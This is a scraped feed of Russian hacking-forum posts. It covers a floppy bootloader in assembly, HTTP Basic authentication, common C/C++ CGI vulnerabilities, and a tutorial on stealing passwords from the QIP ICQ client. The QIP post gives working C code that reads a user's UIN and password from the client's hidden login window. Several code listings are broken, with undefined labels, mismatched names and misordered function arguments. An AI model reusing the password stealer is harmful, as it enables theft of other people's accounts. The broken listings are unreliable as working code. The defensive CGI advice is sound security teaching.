свои функции и объединить их в единый BIOS. Но для этого необходимо множество человеко-часов, поэтому в одиночку справиться с подобной задачей представляется достаточно трудным или попросту невозможным.</p> <p>Итак, наша программа будет располагаться в ПЗУ (постоянное запоминающее устройство). BIOS передаст ей управление, но для этого он должен ее найти. Соответственно наша программа должна находиться в области с С800:0 до E000:0 в памяти, так как эта область сканируется BIOS на наличие определенной сигнатуры 0AA55H. В байте за этой подписью количество байт для подсчета их контрольной суммы. Если контрольная сумма равно нулю, то это ПЗУ и управление передается в область памяти, где была найдена данная сигнатура со смещением 3. Для того, чтобы «уровнять» контрольную сумму, необходимо в конце программы дописать байт, в котором будет число, равное разнице 100h и полученной контрольной суммы. </p> <p>Итак, вот так должна выглядеть ваша программа, которую Вы запишите в ПЗУ.</p> <p>LENGTHROM EQU 2000H ; Размер ПЗУ в байтах = числу после подписи * 200H<br />CODE SEGMENT BYTE PUBLIC<br />ASSUME CS:CODE,DS:CODE<br />ORG 0<br />START:<br />DB 55h<br />DB 0AAh; Размер ПЗУ по модулю 200H<br />DB LENGTHROM SHR 9; Первая выполняемая команда<br />JMP BEGIN<br />BEGIN:<br />; Заносим в регистры нужные значения<br />MOV AX,CS<br />MOV DS,AX<br />; Код программы<br />; Вернуть управление БИОС<br />RETF<br />; Сюда запишем дополняющий байт<br />DB (0)<br />CodeEnd:<br />; заполнение оставшегося кода нулями<br />DB (LENGTHROM-(OFFSET CodeEnd-OFFSET START)) DUP (0FFH)<br />LastByte:<br />CODE ENDS<br />END START</p> <p>Загрузка Linux и Windows</p> <p>Это базовая и очень важная тема. Вспомним о БИОС, который загружает самый первый сектор (Master Boot Record) с выбранного в его настройках устройства (дискеты, винчестера, CD-ROM привода и пр.) по адресу 0x7C00h куда и передает управление. Программа, находящаяся в этой памяти называется первичным загрузчиком. У него не очень много возможностей, так как его размер ограничен 512 байтами. Его задачей является подготовка компьютера, а именно: запись в память вторичный загрузчик, предварительно считанный с HDD, включить линию A20 и перевести процессор в защищенный режим. После этого управление передается вторичному загрузчику, цели работы которого точно не определены. Я считаю, что его главными задачами являются формирование таблицы прерываний, подготовка компьютера к работе с файловой системой, определение периферийных устройств, подключенных к компьютеры, передача управления ядру, скачанному им с диска заложенному в памяти.</p> <p>Чтобы более точно понять устройство загрузки ОС, перед переходом к исходным тестам рассмотрим принципы загрузки наиболее популярных в наше время ОС: Linux и Windows.</p> <p>Linux может загружаться как через специализированный загрузчик (Lilo), так и через boot sector диска. Поскольку загрузчика у нас нет, а есть только желание более полно узнать об устройстве загрузки, рассмотрим второй случай:</p> <p>1) boot sector записывает свой код в 9000h<br />2) Загружает с диска Setup, который находится в нескольких последующих секторах (9000h:0200h;)<br />3) Загружает ядро в 1000h. Ядро так же следует после Setup. Ядро должно быть меньше 508 килобайт<br />4) Управление передается Setup<br />5) Setup проверяется на корректность<br />6) С помощью BIOS определяется оборудование, размер памяти, наличие жестких дисков, наличие шины Micro channel bus, PC/2 mouse, Advanced power management, инициализируются клавиатура и видеосистема<br />7) Процессор переводится в защищенный режим<br />8) Управление передается ядру<br />9) Ядро переписывается по адресу 100000h (если оно было заархивировано, то оно предварительно разархивируется)<br />10) Управление передается ядру<br />11) Активируется страничная адресация<br />12) Происходит инициализация IDT и GDT, при этом в кодовый сегмент и в сегмент данных ядра входит вся виртуальная память<br />13) Инициализируются драйвера<br />14) Управление передается процессу init;<br />15. init запускает все остальные необходимые программы в соответствии с файлами конфигурации(init.X);</p> <p>Теперь рассмотрим загрузку Windows (NT, так как ранние версии устарели):</p> <p>1) boot sector загружает NTLDR<br />2) Процессор переходит в защищенный режим;<br />3) Делаются таблицы страниц<br />4) Механизм преобразования страниц;<br />5) Чтение boot.ini, используя код FS под названием read only. Выводит на экран выбор загрузки ОС (из boot.ini)<br />6) Из boot.ini считывается адрес директории Windows<br />7) Управление получает ntdetect.com, определяющий устройства, установленные на компьютере<br />8) Из %dir%\system32 загружается ntoskrnl.exe, в котором находится ядро.<br />9) Управление передается hal.dll с информацией об аппаратном обеспечении;<br />10) Загружаются драйвера и важные файлы<br />11) Стартует графическая оболочка и пр.</p> <p>Ближе к практике</p> <p>Итак, мы рассмотрели на примерах уже готовых ОС этапы загрузок, а так же устройство памяти. Приступим непосредственно к написанию своей ОС. Начнем мы с написания загрузчика, который должен обеспечить загрузку и подготовить все для старта ОС. Он будет делиться на два (деление условное). Задача первого подготовить базу, а точнее занести в память код с дискеты, после чего передать управление второму загрузчику, задача которого перевести процессор в защищенный режим и сделать другие подготовки для передачи управления уже собственно ядру.</p> <p>1) Первичный загрузчик</p> <p>Загружаться мы будем с дискеты, а следовательно нам необходимо читать с нее данные по секторам. </p> <p>// Принцип работы такой: читать можем только в первые 64к, поэтому сначала считывается цилиндр в 0x50:0 - 0x50:0x2400, а затем копируется туда, куда необходимо. При этом первый цилиндр считываем в конце.</p> <p>section .text<br />BITS 16<br />org 0x7c00<br />// Ядро отправляем в 0x7c00<br />%define CTR 10 <br />%define MRE 5 <br />// Определение переменных<br />enter:<br />cli ;<br />mov ax, cs<br />mov ds, ax<br />mov es, ax<br />mov ss, ax<br />mov sp, 0x7c00<br />sti<br />// Поскольку мы не знаем значений различных регистров (за исключением CS, значение которого равно 0), то мы должны сами занести данные в данные регистры(а именно “занулить” SS, SP и DS). А так же отключить прерывания, чтобы в это время работу загрузчика ни что не сбивало.<br />// Далее:<br />// Мы собираемся перенести с дискеты данные, а попадут они на текущий код, поэтому необходимо перенести его в верхнюю часть доступной памяти. <br />// В DS - адрес исходного сегмента<br />mov ax, 0x07c0<br />mov ds, ax<br />// В ES - адрес целевого сегмента<br />mov ax, 0x9000<br />mov es, ax<br />// Копируем с 0<br />xor si, si<br />xor di, di<br />// Копируем 128 двойных слов<br />mov cx, 128<br />rep movsd<br />// Прыжок в новоиспеченный bootsector (0x9000: 0)<br />jmp 0x9000:start<br />// следующий код выполняется по адресу 0x9000:0<br />begin:<br />// Заполним регистры новыми значениями<br />mov ax, cs<br />mov ds, ax<br />mov ss, ax <br />// Сообщим пользователю о загрузке <br />mov si, msg_startup<br />call ps<br />// Читаем цилиндр начиная с указанного в DI плюс нулевой цилиндр (в самом конце) в AX (адрес, куда будут записаны данные)<br />mov di, 1<br />mov ax, 0x290<br />xor bx, bx<br />.loop:<br />mov cx, 0x50<br />mov es, cx<br />push di<br />// Подсчет головки для использования<br />shr di, 1<br />setc dh<br />mov cx, di<br />xchg cl, ch<br />pop di<br />// Считаны ли все цилиндры?<br />cmp di, CTR<br />je .quit<br />call r_cyl<br />// Цилиндр считали в 0x50:0x0 - 0x50:0x2400 (в линейном варианте - 0x500 - 0x2900)<br />// Скопируем этот блок в нужный адрес:<br />pusha<br />push ds <br />mov cx, 0x50<br />mov ds, cx<br />mov es, ax<br />xor di, di<br />xor si, si<br />mov cx, 0x2400<br />rep movsb<br />pop ds<br />popa<br />// Увеличим DI, AX и повторим все сначала<br />inc di<br />add ax, 0x240<br />jmp short .loop<br />.quit: <br />// Т.к. у нас часть памяти была занята, мы считывали с первого цилиндра, не стоит забыть о нулевом и скачать еще и его<br />mov ax, 0x50<br />mov es, ax<br />mov bx, 0<br />mov ch, 0<br />mov dh, 0<br />call r_cyl<br />// Прыжок на загруженный код<br />jmp 0x0000:0x0700<br />r_cyl:<br />// Читаем заданный цилиндр, ES:BX – буфер, CH – цилиндр, DH - головка<br />// Сбросим счетчик ошибок<br />mov [.err], byte 0<br />pusha<br />// Сообщение о том, какая головку/цилиндр считывается<br />mov si, msg_cyl<br />call ps<br />mov ah, ch<br />call pe<br />mov si, msg_head<br />call ps<br />mov ah, dh<br />call pe<br />mov si, msg_crlf<br />call ps<br />popa<br />pusha<br />.start: <br />mov ah, 0x02<br />mov al, 18<br />mov cl, 1<br />// Прерывание BIOS<br />int 0x13<br />jc .r_err<br />popa<br />ret<br />.err: db 0 <br />.r_err:<br />// Об ошибках сообщаем и выводим их код<br />inc byte [.err]<br />mov si, msg_err<br />call ps<br />call pe<br />mov si, msg_crlf<br />call ps<br />// Что делаем, если ошибок больше нормы:<br />cmp byte [.err], mre<br />jl .start<br />mov si, msg_end<br />call ps<br />hlt<br />jmp short $</p> <p>table: db &quot;0123456789ABCDEF&quot;<br />pe:<br />// ASCII-код преобразуем в его шестнадцатеричного представления и выводим<br />pusha<br />xor bx, bx<br />mov bl, ah<br />and bl, 11110000b<br />shr bl, 4<br />mov al, [table+bx]<br />call pc<br />mov bl, ah<br />and bl, 00001111b<br />mov al, [table+bx]<br />call pc<br />popa<br />ret<br />// Из AL выводим символ на экран<br />pc:<br />pusha<br />mov ah, 0x0E<br />int 0x10<br />popa<br />ret<br />// Строку из SI выводим на экран<br />ps:<br />pusha<br />.loop:<br />lodsb<br />test al, al<br />jz .quit<br />mov ah, 0x0e<br />int 0x10<br />jmp short .loop<br />.quit:<br />popa<br />ret<br />// Служебные сообщения<br />msg_startup: db &quot;OS loading...&quot;, 0x0A, 0x0D, 0<br />msg_cyl: db &quot;Cylinder:&quot;, 0<br />msg_head: db &quot;, head:&quot;,0<br />msg_er: db &quot;Error! Code of it:&quot;,0<br />msg_end: db &quot;Errors while reading&quot;,0x0A,0x0D, &quot;Reboot the computer, please&quot;, 0<br />msg_crlf: db 0x0A, 0x0D,0 </p> <p>// Сигнатура бутсектора: <br />TIMES 510 - ($-$$) db 0<br />db 0xAA, 0x55</p> <p>2) Вторичный загрузчик</p> <p>А теперь вторичный загрузчик:</p> <p>[BITS 16]<br />[ORG 0x700]<br />// Обнулим регистры, установим стек<br />cli <br />mov ax, 0<br />mov ds, ax<br />mov es, ax<br />mov ss, ax<br />mov sp, 0x700<br />sti<br />// Сообщение о приветствии<br />mov si, msg_start<br />call kputs<br />// Сообщение о переходе в защищенный режим<br />mov si, msg_entering_pmode<br />call ps<br />// Отключение курсора (просто так)<br />mov ah, 1<br />mov ch, 0x20<br />int 0x10<br />// Установим базовый вектор контроллера прерываний в 0x20<br />mov al,00010001b <br />out 0x20,al <br />mov al,0x20 <br />out 0x21,al <br />mov al,00000100b <br />out 0x21,al<br />mov al,00000001b <br />out 0x21,al <br />// Отключим прерывания<br />cli<br />// Загрузка регистра GDTR: <br />lgdt [gd_reg]<br />// Включение A20: <br />in al, 0x92<br />or al, 2<br />out 0x92, al<br />// Установка бита PE регистра CR0<br />mov eax, cr0 <br />or al, 1 <br />mov cr0, eax <br />// С помощью длинного прыжка мы загружаем селектор нужного сегмента в регистр CS<br />jmp 0x8: _protect<br />ps:<br />pusha<br />.loop:<br />lodsb<br />test al, al<br />jz .quit<br />mov ah, 0x0e<br />int 0x10<br />jmp short .loop<br />.quit:<br />popa<br />ret<br />// Следующий код - 32-битный<br />[BITS 32]<br />// При переходе в защищенный режим, сюда будет отдано управление<br />_protect: <br />// Загрузим регистры DS и SS селектором сегмента данных<br />mov ax, 0x10<br />mov ds, ax<br />mov es, ax<br />mov ss, ax<br />// Наше ядро слинковано по адресу 2мб, переносим его туда. ker_bin - метка, после которой вставлено ядро<br />mov esi, ker_bin<br />// Адрес, по которому копируем<br />mov edi, 0x200000<br />// Размер ядра в двойных словах (65536 байт)<br />mov ecx, 0x4000<br />rep movsd<br />// Ядро скопировано, передаем управление ему<br />jmp 0x200000<br />gdt:<br />dw 0, 0, 0, 0 <br />// Нулевой дескриптор<br />db 0xFF <br />// Сегмент кода с DPL=0 Базой=0 и Лимитом=4 Гб <br />db 0xFF <br />db 0x00<br />db 0x00<br />db 0x00<br />db 10011010b<br />db 0xCF<br />db 0x00<br />db 0xFF <br />// Сегмент данных с DPL=0 Базой=0 и Лимитом=4Гб <br />db 0xFF <br />db 0x00 <br />db 0x00<br />db 0x00<br />db 10010010b<br />db 0xCF<br />db 0x00<br />// Значение, которое мы загрузим в GDTR: <br />gd_reg:<br />dw 8192<br />dd gdt<br />msg_start: db &quot;Get fun! New loader is on&quot;, 0x0A, 0x0D, 0<br />msg_epm: db &quot;Protected mode is greeting you&quot;, 0x0A, 0x0D, 0</p> <p>Оба загрузчика готовы. Осталось лишь откомпилировать их и отправить на bootsector дискеты.</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:52:06 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=31#p31 http://xhackx.bbon.ru/viewtopic.php?pid=30#p30 <p>Авторизация HTTP</p> <p>При запросе защищенной паролем страницы/директории сервер возвращает код <br />ошибки 401 Unauthorized.<br />В полном виде ответ от сервера выглядит так:</p> <p>HTTP/1.0 401 Unauthorized<br />Date: Mon, 28 Aug 2000 07:24:37 GMT<br />Server: SAMBAR 4.2<br />MIME-version: 1.0<br />Content-type: text/html<br />WWW-Authenticate: basic realm=&quot;Sambar Admin Login&quot;</p> <p>&lt;xmp&gt;<br />&lt;HTML&gt;<br />&lt;HEAD&gt;<br />&lt;TITLE&gt;Invalid Login&lt;/TITLE&gt;<br />&lt;/HEAD&gt;<br />&lt;BODY BGCOLOR=&quot;#FFFFFF&quot; LINK=#990033 VLINK=#990033 ALINK=#990033&gt;<br />&lt;TABLE BORDER=0 WIDTH=500 CELLPADDING=10 CELLSPACING=10&gt;<br />&lt;TR&gt;&lt;TD BGCOLOR=#990033 ALIGN=LEFT&gt;<br />&lt;FONT SIZE=5 COLOR=#FFFFFF&gt;&lt;B&gt;Invalid Login&lt;/B&gt;&lt;/FONT&gt;<br />&lt;/TR&gt;&lt;/TD&gt;<br />&lt;TR&gt;&lt;TD&gt;<br />&lt;BR&gt;<br />The username/password you provided is not valid.&#160; <br />&lt;/TD&gt;&lt;/TR&gt;<br />&lt;TR&gt;&lt;TD&gt;<br />&lt;BR&gt;<br />&lt;A HREF=&quot;http://www.sambar.com&quot;&gt;&lt;FONT SIZE=2&gt;Powered by Sambar&lt;/FONT&gt;&lt;/A&gt;<br />&lt;/TD&gt;&lt;/TR&gt;<br />&lt;/TABLE&gt;<br />&lt;/BODY&gt;<br />&lt;/HTML&gt;</p> <p>После ввода логина и пароля серверу отправляется запрос:</p> <p>GET /session/adminlogin?RCpage=/sysadmin/index.stm HTTP/1.1<br />User-Agent: Opera/4.0 (Windows 95;US)&#160; [en]<br />Host: localhost<br />Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*<br />Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0<br />Authorization: Basic T3p6bWFuOjEyMzQ1Njc4OTA=<br />Connection: Keep-Alive, TE<br />TE: deflate, gzip, chunked, identity, trailers</p> <p>значение Authorization получается следующим образом:<br />логин и пароль выстраиваются в одну строку и разделяются &quot;:&quot;<br />&quot;ozzman:1234567890&quot;</p> <p>далее строка кодируется по три символа:</p> <p>1. от a[1] берутся старшие 6 бит. a[1] shr 2;<br />далее выбирается символ из таблицы: <br />crypt[1]=table[a[1] shr 2];</p> <p>2. от a[1] берутся последние два бита и сдвигаются на 4 влево- a[1] shl 4;<br />от a[2] берутся старшие 4 бита [a2] shr 4;<br />crypt[2]=table[((a[1] and 3) shl 4) or (a[2]&#160; shr 4)];</p> <p>3. от a[2] берутся младшие четыре бита и сдвигаются влево на 2 - <br />(a[2] and 0fh) shl 2;<br />от a[3] берутся старшие два бита.<br />crypt[3]=table[((a[2] and 0fh) shl 2) or (a[3] shr 6)];</p> <p>4. от a[3] берутся младшие 6 бит - a[3] and 3fh;<br />crypt[4]=table[a[3] and 3fh];</p> <p>table1=&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;</p> <p>Ozzman</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:50:57 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=30#p30 http://xhackx.bbon.ru/viewtopic.php?pid=29#p29 <p>Тебе, наверное, интересно, почему всякие там кул хацкеры используют C/С++, вместо того чтобы выучить и заюзать рульный скрипт - Perl, Bash, PHP, VBS (нужное подчеркнуть). Отвечаю:</p> <p>1. Скорость. В отличие от скриптов, язык C/C++ - компилируемый, поэтому код получается быстрее, также язык C/C++ более низкоуровневый, поэтому на нем проще избежать накладных расходов.</p> <p>2. Надежность. Даже если хакер получит доступ на чтение к папкам, на которых лежат исполняемые CGI-файлы, то его постигнет разочарования, т.к. он не найдет исходного кода твоей CGI-шки, т.к. C-шных исходник ты хранишь в банке под надежным замком, а на сервере лежит только скомпилированная программа. И хакер будет долго разбираться в дизассемблере, чтобы понять, есть в твоей программе баги или нет. Также C, а особенно C++, является строго типизированным языком, поэтому о многих ошибках тебе компилятор скажет еще на этапе компиляции.</p> <p>3. Мощность. Для С/C++ намного проще найти или написать нестандартные вещи, начиная от генерации картинок и музыки при заходе пользователя до управления свистком чайника. Также современные компиляторы C++ намного опережают по богатству возможностей обычные скрипты.</p> <p>4. Время/опыт. Лучше потратить время на углубление своих знаний и повышения опыта по использованию C/C++, чем потратить свое время на изучение очередного скрипта. Так знание C/C++ поможет тебе написать сниффер, keygen, троян, вирус (список можно продолжать до бесконечности), а зная только скрипты, ты будешь привязан к узкому кругу задач.</p> <p>C++ РУЛИТ</p> <p>Скажу тебе по секрету, что все продвинутые хакеры уже давно вместо С используют C++ из-за его мощности и удобства. В C++ очень легко избежать или свести к минимуму все вышеприведенные ошибки. Так вместо страшно неудобных и очень бажных строк char *, а значит, соответственно, и использования функций strcat, strcpy, можно использовать класс строк - std::string. Вместо опасного printf/scanf/gets можно использовать std::stream и operator &gt;&gt;/&lt;&lt;. А обычные C`шные массивы можно заменит на std::vector, std::list, std::map.</p> <p>Также не секрет, что многие ошибки в программах связаны с тем, что программеру было просто лень писать более сложный код и он ограничивается самым простым (но и, к сожалению, самым бажным) вариантом. Но и здесь C++ облегчает жизнь программисту, т.к. в язык уже включена большая и безопасная библиотека STL, с помощью которой многие сложные вещи, занимающие на C несколько экранов, пишутся на C++ в несколько строчек. Также использование С++ упрощает повторное использование кода, что позволяет один раз написать свою небольшую библиотечку, а потом ее использовать во всех своих программах.</p> <p>Если тебя еще не убедили вышеприведенные аргументы, то вот тебе еще один. Плюсы поддерживают конструкцию try/catch, при ее аккуратном применении можно забыть о таких сообщениях, как &quot;core dumped&quot;, &quot;access violation&quot;, &quot;division by zero&quot; и т.д.</p> <p>А сейчас давай посмотрим, какие ошибки можно поиметь при написании CGI-шек на C/C++ (мы ведь с тобой кул хацкеры и не пишем CGI-шки на всяких там скриптах). Сразу тебя обрадую, на C (в дальнейшем, говоря C, я подразумеваю C/C++) нет этих дурацких ошибок с нулевым символом, а также с выполнением программ во время простейшего открытия файла. Но в C нас с тобой поджидают не менее опасные ошибки: переполнение буфера, ошибка форматной строки и др. Ошибки я буду показывать на примере обычных консольных программ (это программы, которые работают в текстовом режиме), т.к. CGI-шка как раз и является обычной консольной программой.</p> <p>1 (a). Переполнение буфера при использовании стандартных функций</p> <p>Одна из самых распространенных и опасных ошибок, т.к. под данную ошибку очень легко написать exploit.<br />Пример грубой ошибки:</p> <p>char name[300];<br />scanf(&quot;%s&quot;, name);</p> <p>Число 300 взято от балды, вместо него могло быть и 30, и 300000, от ошибки это не спасает, т.к. все равно можно ввести (или написать прогу, которая будет вводить) строку большей длины.</p> <p>Пример тонкой ошибки:</p> <p>char s[6];<br />itoa (value, s, 10);</p> <p>Если переменная value вводилась пользователем, то он мог ввести число, в котором цифр больше, чем 5, т.к. самое длинное целое число (-2147483648) содержит 13 символов, разницы в 7 символов часто хватает с лихвой, чтобы написать под эту ошибку exploit.</p> <p>Ошибке &quot;переполнение буфера&quot; подвержены следующие стандартные функции (в скобочках указан безопасный аналог, если он есть) - gets (fgets), strcpy (strncpy), strcat(strncat), при неосторожном обращении опасны также функции - sprintf (snprintf), vsprintf (vsnprintf), scanf, fscanf, sscanf, itoa.</p> <p>1 (б). Переполнение буфера в своем коде</p> <p>Переполнение буфера поджидает не только при использовании стандартных функций, но и при написании своего кода.</p> <p>Пример грубой ошибки:</p> <p>int index, value, array[100];<br />std::cout &gt;&gt; index &gt;&gt; value; //вводим номер элемента массива, вводим число<br />array[index] = value; //записываем введенное число в массив</p> <p>В данной задаче надо было проверять переменную index на правильное значение - оно должно было быть больше нуля и меньше 100.</p> <p>Пример тонкой ошибки:</p> <p>char buf[200], *p = buffer;<br />int i = 0;<br />for (i = 0; (buf[i] = getchar()) != ' ' &amp;&amp; i &lt; 200; ++i){}<br />buf[i] = 0;</p> <p>Максимально введенная строка будет занимать 201 байт, а не 200, как рассчитывалось. Exploit на данный конкретный случай будет сложно написать, но уронить программу можно будет запросто, а при небольшом везении может все-таки получиться и exploit.</p> <p>Рекомендации по избежанию данной ошибки просты:<br />a. Проверяй все входные параметры на корректность.<br />b. Будь внимателен при написании кода, работающего с массивами.<br />2. Ошибка форматной строки<br />При выводе строк с помощью функций семейства printf многие ленивые программисты или &quot;крутые оптимизаторы&quot; (которые стараются экономить даже на спичках) пишут вместо printf (&quot;%s&quot;, str) просто printf (str).</p> <p>Во втором случае, если строка str вводилась пользователем, в нее можно вставить форматные спецификаторы (%s, %d и т.д.), которые могут не только завалить программу, но и поспособствовать выполнению exploit`а.</p> <p>Данной ошибке подвержены следующие функции: все функции семейства printf (sprintf, fprintf, vsprintf и т.д.), функции семейства scanf (если форматная строка ввода формируется с использованием введенных пользователем строк), функции, основанные на printf - syslog, setproctitle и т.д.</p> <p>Рекомендация одна - &quot;не ленись&quot; и пиши полный вариант вызова, а также осторожно используй введенные пользователем строки при формировании форматной строки.</p> <p>3. Чтение и запись произвольных файлов</p> <p>При использовании введенных пользователем строк в качестве имен файлов в функциях open, fopen надо отфильтровывать из введенных строк символы '.'(если '.' по каким-либо причинам нужна, тогда надо отфильтровывать '..', '/..', '../' и '..').</p> <p>Пример грамотного кода, который сначала отфильтровывает точки и только потом использует для создания директории введенную строку:</p> <p>char buf[1024] ={0};;<br />fgets (stdin, sizeof(buf)/sizeof(buf[0]), buf);<br />for (int j = 0, i = 0; ; ++i)<br />{<br />if (buf[i] != '.')<br />buf[j++] = buf[i];<br />if (!buf[i]) break;<br />}<br />mkdir (buf);</p> <p>Данную фильтрацию надо применять для всех функций работы с файлами - open, fopen, mkdir, rmdir, chdir, tempnam, tmpnam, функции exec, функции spawn.</p> <p>4. Функция system</p> <p>Для выполнения системных утилит или для вызова других программ часто используется функция system. Если строки, введенные пользователем, используются в функции system, то их надо обязательно брать в кавычки. При этом если исходная строка уже содержала кавычки, то их надо отфильтровывать (если кавычки в строке все-таки необходимы, тогда их нужно эскейпить - заменяя на две кавычки подряд или на слэш кавычки, в зависимости от используемой системы).</p> <p>Посылаем введенную пользователем строку себе на WinPopup:</p> <p>std::string s;<br />std::cin &gt;&gt; s;<br />std::string s2 = &quot;net send 127.0.0.1 &quot;;<br />for (std::string::iterator it = s.begin(); it != s.end(); ++it)<br />{<br />if (*it == '&quot;') s2+= '&quot;'; //или s2+=''<br />s2+= *it;<br />}<br />std::system (s2);<br />EXIT(0)</p> <p>В данной статье я рассмотрел только самые широко распространенные ошибки, за бортом остались мелкие и специфичные ошибки, а также те ошибки, которые невозможно (очень сложно) использовать для внедрения exploit`а.</p> <p>Напоследок я могу сказать только одно: проверяй и еще раз проверяй все введенные параметры, которые приходят со стороны пользователя. Проверяй даже в том случае, если эти параметры формируются твоим кодом, т.к. если программа стоит у пользователя, ее легко взломать и подправить передаваемые параметры либо написать свою программу, которая будет опять же генерировать &quot;плохие&quot; данные. Еще лучше, если данные, приходящие от пользователя, не используются напрямую, а используются только косвенно. Так, если cgi-шка работает с файлами, то название файла лучше не передавать на сторону клиента, а лучше сохранить в массиве, а клиенту отдать только индекс; при получении индекса от клиента обратно проверить его на корректность и достать название файла из массива по этому индексу.</p> mybb@mybb.ru (admin) Fri, 13 Mar 2009 15:48:27 +0300 http://xhackx.bbon.ru/viewtopic.php?pid=29#p29 http://xhackx.bbon.ru/viewtopic.php?pid=28#p28 <p>Меня порой поражает беспечность разработчиков программных продуктов. И данные шифруют, и алгоритмы новые придумывают, и программы свои от взлома защищают, но пользы большой это не приносит.</p> <p>Любой более-менее продвинутый пользователь знает, что хранить пароли на диске небезопасно. Самое надежное хранилище паролей - это голова. В то же время, большинство программ, требующих авторизации пользователя, предоставляют возможность сохранения (запоминания) пароля в программе для ускорения процесса входа в систему в дальнейшем. Разработчики реализуют эту функцию по разному - кто-то хранит пароль в файлах настроек, кто-то в реестре, кто-то в защищенном хранилище Windows (тот же реестр, но доступный лишь пользователю System). Вариантов хранения масса. Впрочем, как и методов кражи паролей из этих мест. Существует множество вредоносных программ, основной или дополнительной функцией которых является кража сохраненных паролей с жесткого диска жертвы.</p> <p>Мы, ведь с вами, продвинутые пользователи, правда? И поэтому, никогда не сохраняем пароли, а только запоминаем. Верно ли утверждение, что в этом случае наш пароль в безопасности? Давайте проверим.</p> <p>Что нам понадобится?</p> <p>&#160; &#160;1. Spy++ из пакета MS Visual Studio, или любая подобная утилита.<br />&#160; &#160;2. PE Tools, или любая утилита, позволяющая сделать дамп процесса.<br />&#160; &#160;3. Hex Workshop, или любой другой шестнадцатеричный редактор.<br />&#160; &#160;4. MS Visual C++, или любой C компилятор.</p> <p>Что будем исследовать?</p> <p>&#160; &#160;1. QIP. У меня - билд 8040. (qip.ru)<br />&#160; &#160;2. &amp;RQ. Я использовал версию 0.9.7.4. (andrq.org)<br />&#160; &#160;3. Mail.Ru Агент. Версия 5.0, билд 2082. (agent.mail.ru)</p> <p>Взлом паролей QIP</p> <p>Бесплатный интернет-пейджер, написанный и поддерживаемый российским программистом. У QIP миллионы поклонников, которые любят его за удобство, кучу скинов и массу других полезных возможностей.<br />Если у вас еще нет этого ICQ-клиента - вперед на сайт разработчика за последней версией. Устанавливаем, запускаем.</p> <p>Открывшееся окно предлагает нам ввести данные авторизации, либо завести новую учетную запись. Не важно, зарегистрируете ли вы новый аккаунт, или будете заходить со своими учетными данными. Двигаемся дальше.</p> <p>QIP любезно предоставляет нам возможность сохранить пароль. Пароль мы сохранять не будем. Пока оставляем QIP в покое и открываем Spy++. Жмем Alt+F3 и открываем диалог поиска окна. Берем мышкой Finder Tool и кидаем его на окно менеджера учетных записей QIP'а.</p> <p>Нажимаем Ok и Spy++ показывает нам в списке окон нужное нам окно - &quot;QIP - Спокойное общение!&quot;, имя класса которого TManForm. На нем дерево дочерних окон, обеспечивающих интерфейс подключения к серверу. Нас интересуют TGroupBox, TComboBox на нем и TEdit. Это как раз наши UIN и пароль. Запомним название классов.</p> <p>Переходим снова в окно QIP и нажимаем кнопку &quot;Подключиться&quot;.</p> <p>Диалог входа закрылся. Можно общаться. Но проверим, закрылось ли окно диалога? Обновим список окон в Spy++ (клавиша F5) и попробуем снова найти окно авторизации QIP. Нажимаем Alt+F3 и вводим параметры поиска. Для того чтобы найти окно нам надо указать хотя бы один параметр: Handle - уникальный идентификатор окна, Caption - надпись формы, Class - имя класса окна. Мы будем искать по классу.</p> <p>Вводим в поле Class класс окна TManForm. Жмем Ok.</p> <p>Что мы видим? Окно не закрылось. Оно просто невидимо... Попробуем прочитать поля с данными авторизации. Для этого используем стандартный механизм общения окон и системы в Windows - сообщения.</p> <p>Начинаем программировать.</p> <p>void main()<br />{<br />// Объявим переменные, необходимые для работы<br />HWND hManForm,hGroupBox,hEdit,hComboBox; // Идентификаторы форм<br />char* pUIN; // Указатель на буфер для UIN<br />char* pPass; // Указатель на буфер для пароля<br />int iUIN; // Длина UIN<br />int iPass; // Длина пароля</p> <p>// Найдем окно диалога авторизации<br />hManForm=FindWindow(&quot;TManForm&quot;,0);<br />// Расположенная на нем группа элементов управления<br />hGroupBox=FindWindowEx(hManForm,0,&quot;TGroupBox&quot;,0);</p> <p>// Список с UIN'ами<br />hComboBox=FindWindowEx(hGroupBox,0,&quot;TComboBox&quot;,0);<br />// Получим длину текста в списке<br />iUIN=SendMessage(hComboBox, WM_GETTEXTLENGTH, 0, 0)+1;<br />// Выделяем необходимую память для буфера<br />pUIN=(char*)LocalAlloc(0, iUIN);<br />// Получим непосредственно текст<br />SendMessage(hComboBox, WM_GETTEXT, iUIN, (long)pUIN);</p> <p>// Поле с паролем<br />hEdit=FindWindowEx(hGroupBox,0,&quot;TEdit&quot;,0);<br />// Дальше все по аналогии с UIN'ом<br />iPass=SendMessage(hEdit, WM_GETTEXTLENGTH, 0, 0)+1;<br />pPass=(char*)LocalAlloc(0, iPass);<br />SendMessage(hEdit, WM_GETTEXT, iPass, (long)pPass);</p> <p>//Выведем что получилось<br />cout &lt;&lt; &quot;[!!!]Found for: &quot;&lt;&lt; pUIN &lt;&lt; &quot;tPassword: &quot; &lt;&lt; pPass;</p> <p>// Освободим память<br />LocalFree(pUIN);<br />LocalFree(pPass);<br />}</p> <p>Сохраняем, компилируем, запускаем. Что у нас получилось? Если все сделано верно, то программа вернет строку, содержащую ваш UIN и пароль.</p> <p>Следует заметить, что если мы запустим QIP, в котором предварительно была установлена опция &quot;Сохранить пароль&quot;, то данный метод получения пароля работать не будет, так как в поле пароля находится текст &quot;&lt;:HIDDEN:&gt;&quot;. Видимо, разработчик, краем уха все-таки слышал про безопасность.<br />Взлом паролей &amp;RQ</p> <p>Так же бесплатный и не менее популярный, чем QIP, ICQ-клиент, который ласково называют &quot;крысой&quot;. Крыса поддерживает плагины, скины и поддерживается сообществом разработчиков.</p> <p>Качаем последнюю стабильную версию с офсайта и начинаем исследование.</p> <p>После запуска &amp;RQ предлагает нам создать новый профиль, для чего надо указать свой UIN, либо зарегистрировать новый. Далее предлагается выбрать язык интерфейса и программа благополучно стартует. Для того, чтобы крыса подключилась к серверу, надо выбрать статус &quot;Онлайн&quot;. Программа запрашивает пароль и подключается. Можно указать программе что надо подключаться автоматически при старте, для этого надо в настройках (Alt+P) поставить опцию &quot;Соединяться при запуске&quot; на фрейме &quot;Запуск&quot;. Это не обязательно. Для нас же важна опция &quot;Не сохранять пароль&quot;, в категории 